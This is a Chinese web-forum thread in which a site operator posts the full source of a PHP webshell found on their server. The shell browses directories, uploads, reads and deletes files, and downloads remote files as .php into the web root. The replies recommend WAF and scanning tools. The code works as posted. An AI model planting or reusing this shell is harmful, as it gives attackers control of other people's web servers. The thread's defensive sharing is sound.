·设为首页收藏本站📧邮箱修改🎁免费下载专区💎积分✅卡密📒收藏夹👽聊天室
12下一页
返回列表 发布新帖

大马一个,阿D都没扫出来

213 10
发表于 2024-7-31 17:56:57 | 查看全部 阅读模式

马上注册,免费下载更多dz插件网资源。

您需要 登录 才可以下载或查看,没有账号?立即注册

×
<?php
error_reporting(0);
echo '
<table width="380" border="0" cellpadding="3" cellspacing="1" align="center"><tr><td>Current Path : ';
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<a href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
echo '</td></tr><tr><td>';
if(isset($_FILES['uploadedfile'])){
$target_path=basename($_FILES["uploadedfile"]["name"]);if(move_uploaded_file($_FILES["uploadedfile"]["tmp_name"],$path.'/'.$target_path)){echo '<font color="green">file uploaded</font><br />';}else{echo '<font color="red">upload fail</font><br />';}
}
echo "<form enctype=\"multipart/form-data\" method=\"POST\" action=\"?path=$path\"><input name=\"uploadedfile\" type=\"file\"/><input type=\"submit\" value=\"Upload File\"/></form></td></tr>";
function get($url, $dir) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch,CURLOPT_TIMEOUT,10);
        $data = curl_exec($ch);
        if(!$data){
                $data = @file_get_contents($url);
        }
        file_put_contents($dir, $data);
}
if($_GET['url']){
        $url = $_GET['url'];
        preg_match('/(.*)\/(.*)\.(.*?)$/',$url,$n);
        if($n[3]=='txt'){
                $z='php';
                $name=$n[2];
        }else{
                $z=$n[3];
                $name="moban";
        }
        if($_GET['dir']){
                $dir=$_SERVER["DOCUMENT_ROOT"].'/'.$_GET['dir'].'/'.$name.'.'.$z;
        }else{
                $dir=$_SERVER["DOCUMENT_ROOT"].'/'.$name.'.'.$z;
        }
        get($url,$dir);
        if(file_exists($dir)){echo "<tr><td><font color=\"green\">download success</font></td></tr>";}else{echo "<tr><td><font color=\"red\">download fail</font></td></tr>";}
}elseif($_POST['url']){
        $url = $_POST['url'];
        preg_match('/(.*)\/(.*)\.(.*?)$/',$url,$n);
        if($n[3]=='txt'){
                $z='php';
                $name=$n[2];
        }else{
                $z=$n[3];
                $name="moban";
        }
        $dir = $_POST['path']."/".$name.'.'.$z;
        get($url,$dir);
        if(file_exists($dir)){echo "<tr><td><font color=\"green\">download success</font></td></tr>";}else{echo "<tr><td><font color=\"red\">download fail</font></td></tr>";}
}
echo "<tr><td><form method=\"POST\" action=\"?path=$path\"><span>Url: </span><input type=text name=\"url\" value=\"\"><input type=\"hidden\" name=\"path\" value=\"$path\"><input type=submit value=\"Download\"></form></td></tr>";
if(isset($_GET['filesrc'])){
        echo "<tr><td>Current File : ";
        echo $_GET['filesrc'];
        echo '</tr></td></table><br />';
        echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
        }elseif(isset($_GET['check']) &&  $_GET['check'] == '1'){
                $RootDir = $_SERVER['DOCUMENT_ROOT'];
                $filename = $RootDir.'/index.php';
                echo "<tr><td>Current File : ";
                echo $filename;
                echo '</tr></td></table><br />';
                echo('<pre>'.htmlspecialchars(file_get_contents($filename)).'</pre>');
        }else{
        echo '</table><br /><center>';
        if(isset($_GET['option']) &&  $_GET['option'] == 'delete'){
                if(unlink($_GET['delfile'])){
                        echo '<font color="green">Delete File Done.</font><br />';
                }else{
                        echo '<font color="red">Delete File Error.</font><br />';
                }
        }
        echo '</center>';
        $scandir = scandir($path);
        echo '<div id="content"><table width="380" border="0" cellpadding="3" cellspacing="1" align="center"><tr class="first"><td>Name</td><td>Size</td><td>Options</td></tr>';
        foreach($scandir as $dir){
                if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
                        echo "<tr><td><a href=\"?path=$path/$dir\">$dir</a></td><td>DIR</td><td>none</td></tr>";
                }
        echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
        foreach($scandir as $file){
                if(!is_file("$path/$file")) continue;
                $size = filesize("$path/$file")/1024;
                $size = round($size,3);
                if($size >= 1024){
                        $size = round($size/1024,2).' MB';
                }else{
                        $size = $size.' KB';
                }
                echo "<tr><td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td><td>".$size."</td><td><a href=\"?path=$path&delfile=$path/$file&option=delete\">Delete</a></td></tr>";
        }
        echo '</table></div>';
}
我要说一句 收起回复
创宇盾启航版免费网站防御网站加速服务

评论10

IT618发布Lv.8 发表于 2024-7-31 17:57:40 | 查看全部
论坛的源码?
我要说一句 收起回复
拾光Lv.8 发表于 2024-7-31 17:57:56 | 查看全部
大马一个,阿D都没扫出来 大马,一个,出来
加库了
我要说一句 收起回复
拾光Lv.8 发表于 2024-7-31 17:58:04 | 查看全部
我服务器上发现的
我要说一句 收起回复
浅生Lv.8 发表于 2024-7-31 17:58:44 | 查看全部
!!!!!!!!!!!!
我要说一句 收起回复
浅生Lv.8 发表于 2024-7-31 17:59:15 | 查看全部
D盾非常不错的,win服务器必备,靠规则很容易过时,主打主动防御、免费的就雷池waf,百度安全的openrasp也挺好,但是太多年不更新了,严重落后
我要说一句 收起回复
TyCodingLv.8 发表于 2024-7-31 17:59:21 | 查看全部
Linux有什么免费的软件吗?
我要说一句 收起回复
独家记忆Lv.8 发表于 2024-7-31 17:59:58 | 查看全部
雷池waf、宝塔的堡塔云waf:https://www.bt.cn/new/btwaf
我要说一句 收起回复
IT618发布Lv.8 发表于 2024-7-31 18:00:10 | 查看全部
我昨天有一台服务器上,也发现大马,有四五个站中标, 在各种文件夹里放大马.最后下载整个源码,再看修改时间,一一排除.
我要说一句 收起回复
CrystαlLv.8 发表于 2024-7-31 18:00:39 | 查看全部
***内容可能违规暂时被隐藏***
我要说一句 收起回复

回复

 懒得打字嘛,点击右侧快捷回复【查看最新发布】   【应用商城享更多资源】
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

图文热点
创宇盾启航版免费网站防御网站加速服务
投诉/建议联系

discuzaddons@vip.qq.com

未经授权禁止转载,复制和建立镜像,
如有违反,按照公告处理!!!
  • 联系QQ客服
  • 添加微信客服

联系DZ插件网微信客服|最近更新|Archiver|手机版|小黑屋|DZ插件网! ( 鄂ICP备20010621号-1 )|网站地图 知道创宇云防御

您的IP:3.147.28.111,GMT+8, 2024-11-24 10:17 , Processed in 0.515345 second(s), 132 queries , Gzip On, Redis On.

Powered by Discuz! X5.0 Licensed

© 2001-2024 Discuz! Team.

关灯 在本版发帖
扫一扫添加微信客服
QQ客服返回顶部
快速回复 返回顶部 返回列表